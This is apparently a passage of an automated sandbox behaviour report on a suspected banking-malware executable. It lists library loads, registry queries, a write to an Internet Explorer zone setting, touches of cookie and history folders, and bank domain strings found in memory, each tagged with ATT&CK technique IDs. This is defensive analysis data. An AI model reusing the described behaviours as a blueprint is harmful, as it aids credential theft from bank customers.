\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 75a60000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter Rstrtmgr (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004744)\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75490000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"www.credit-agricole.fr\" (Source: 00000000-00004744.00000001.257811.00650000.00000004.mdmp, 00000000-00004744.00000002.259734.00650000.00000004.mdmp, 00000000-00004744.00000003.265254.00650000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00004744.00000001.257811.006FE000.00000004.mdmp, 00000000-00004744.00000002.259734.006FE000.00000004.mdmp, 00000000-00004744.00000003.265254.006FE000.00000004.mdmp, Indicator: \"capitalone.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\Rstrtmgr.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\ncrypt.dll\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\DNSCACHE\\PARAMETERS\"; Key: \"\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\DNSCLIENT\"; Key: \"\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEM\\DNSCLIENT\"; Key: \"\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\"; Key: \"\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\version.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe.Local\\\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\system32\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\system\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to touch file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe.Local\\\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\CKDNCXYS\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" trying to access non-existent file \"C:\\24A4EBF1DE71F332F38DE69BAF2DA3019A87D45129411AD4F7D3EA48F506119D.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\ckdncxys\\json[1].json\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"json_1_.json\" has type \"JSON data\"- [targetUID: 00000000-00004744]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\CKDNCXYS\\json[1].json\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\History\"\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\CKDNCXYS\\json[1].json\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"AUTODIALDLL\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPV6DOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\LINKAGE\"; Key: \"BIND\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" called \"FindResourceA\" with parameter \"4639268\" - (UID: 00000000-00004744)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"24a4ebf1de71f332f38de69baf2da3019a87d45129411ad4f7d3ea48f506119d.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": 